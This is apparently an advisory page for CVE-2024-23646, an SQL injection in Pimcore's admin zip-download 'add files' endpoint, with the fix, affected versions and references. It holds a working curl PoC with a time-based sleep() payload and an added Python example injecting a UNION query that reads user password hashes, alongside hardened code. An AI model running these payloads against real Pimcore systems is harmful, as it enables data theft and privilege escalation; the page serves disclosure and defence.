CVE-2024-23646
HIGH 8.8 | EPSS 0.14% | SQL Injection in Admin download files as zip
Description
### Summary

The application allows creating zip files from the files available on the site. The `selectedIds` parameter of the "add files" step is susceptible to SQL injection.

### Details

[downloadAsZipJobsAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006) escapes its parameters before building the query, but [downloadAsZipAddFilesAction](https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087) does not: the comma-separated ids from the request are concatenated into the SQL statement as-is. The reporter suggested adding the same quoting the jobs action already uses (the fix shipped in v1.3.2 is in the commit linked under References):

```php
$quotedSelectedIds = [];
foreach ($selectedIds as $selectedId) {
    if ($selectedId) {
        // Quote every id so it can only ever reach the query as a string literal.
        $quotedSelectedIds[] = $db->quote($selectedId);
    }
}
```

### PoC

- Set up an example project as described on https://github.com/pimcore/demon (demo package with example content).
- Log in. Grab the `X-pimcore-csrf-token` header from any request to the backend, as well as the `PHPSESSID` cookie.
- Run the following script, substituting the values accordingly:

```bash
#!/bin/bash
BASE_URL=http://localhost                                 # REPLACE THIS!
CSRF_TOKEN="5133f9d5d28de7dbab39e33ac7036271284ee42e"      # REPLACE THIS!
COOKIE="PHPSESSID=4312797207ba3b342b29218fa42f3aa3"        # REPLACE THIS!

# Time-based payload: a 6-second sleep appended as the second element of selectedIds.
SQL="(select*from(select(sleep(6)))a)"

curl "${BASE_URL}/admin/asset/download-as-zip-add-files?_dc=1700573579093&id=1&selectedIds=1,${SQL}&offset=10&limit=5&jobId=655cb18a37b01" \
  -X GET \
  -H "X-pimcore-csrf-token: ${CSRF_TOKEN}" \
  -H "Cookie: ${COOKIE}"
```

- The response is delayed by 6 seconds, confirming that the injected `sleep()` was executed by the database.

### Impact

Any backend user with very basic permissions (a valid session and CSRF token are all the endpoint requires, hence PR:L in the CVSS vector) can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.
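To make the vulnerable pattern and its hardening concrete, here is an added example (not Pimcore's code, and not the fix from the linked commit) that models the "ids spliced into an `IN (...)` clause" bug in Python against an in-memory SQLite table. The `assets` and `users` tables, their rows, and the `path = '/'` filter standing in for a permission check are all constructed for the example; SQLite has no `sleep()`, so the injection shown reads another table with `UNION` instead of the time-based payload from the PoC. The hardened variant allow-lists each id as a positive integer and then binds the values as parameters.

```python
import re
import sqlite3

# Constructed, minimal stand-in for the tables the controller would query.
# This is NOT Pimcore's schema; it exists only so the example runs offline.
SCHEMA = """
CREATE TABLE assets (id INTEGER PRIMARY KEY, filename TEXT, path TEXT);
CREATE TABLE users  (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
INSERT INTO assets VALUES (1, 'logo.png', '/'), (2, 'hero.jpg', '/'),
                          (3, 'payroll.pdf', '/private/');
INSERT INTO users  VALUES (1, 'admin', 'hash-of-admin-password');
"""


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_add_files(conn: sqlite3.Connection, selected_ids: str) -> list:
    """Unpatched pattern: the raw request value lands inside IN (...).

    Anything after a ')' in selected_ids becomes part of the statement, so
    the caller can append UNION / OR clauses or comment out the rest.
    """
    sql = (
        "SELECT id, filename FROM assets "
        f"WHERE id IN ({selected_ids}) AND path = '/' ORDER BY id"
    )
    return conn.execute(sql).fetchall()


# Asset ids are positive integers; reject everything else before touching SQL.
_ID_RE = re.compile(r"^[1-9][0-9]*$")


def parse_selected_ids(selected_ids: str) -> list:
    """Allow-list parser for the comma-separated id list.

    Empty elements (e.g. a trailing comma) are skipped; any element that is
    not a plain positive decimal integer raises ValueError.
    """
    ids = []
    for part in selected_ids.split(","):
        part = part.strip()
        if not part:
            continue
        if not _ID_RE.match(part):
            raise ValueError(f"invalid asset id: {part!r}")
        ids.append(int(part))
    return ids


def is_valid_selected_ids(selected_ids: str) -> bool:
    try:
        parse_selected_ids(selected_ids)
        return True
    except ValueError:
        return False


def hardened_add_files(conn: sqlite3.Connection, selected_ids: str) -> list:
    """Patched pattern: validated integers bound as query parameters."""
    ids = parse_selected_ids(selected_ids)
    if not ids:
        # MySQL rejects "IN ()" as a syntax error; short-circuit instead.
        return []
    placeholders = ",".join("?" * len(ids))
    sql = (
        "SELECT id, filename FROM assets "
        f"WHERE id IN ({placeholders}) AND path = '/' ORDER BY id"
    )
    return conn.execute(sql, ids).fetchall()


if __name__ == "__main__":
    db = build_db()
    payload = "0) UNION SELECT id, password FROM users --"
    print("vulnerable, benign input :", vulnerable_add_files(db, "1,2"))
    print("vulnerable, injected     :", vulnerable_add_files(db, payload))
    print("hardened, benign input   :", hardened_add_files(db, "1,2"))
    print("hardened accepts payload?:", is_valid_selected_ids(payload))
```

The advisory's own suggestion, `$db->quote()` on every element, also neutralises the payload, because the element becomes a string literal that MySQL coerces to a number rather than executable SQL. Since the ids are integers anyway, casting or allow-listing them as above is the stricter option: it does not rely on the database's string-to-number coercion, and it makes the `sleep()` payload from the PoC fail validation before any query is built.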
Affected packages (1)
- Packagist / pimcore/admin-ui-classic-bundle: >= 1.0.0, < 1.3.2
CVSS score
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH 8.8 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
References (7)
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2024-23646
- PATCH https://github.com/pimcore/admin-ui-classic-bundle
- WEB https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006
- WEB https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087
- WEB https://github.com/pimcore/admin-ui-classic-bundle/commit/363afef29496cc40a8b863c2ca2338979fcf50a8
- WEB https://github.com/pimcore/admin-ui-classic-bundle/releases/tag/v1.3.2
- WEB https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-cwx6-4wmf-c6xv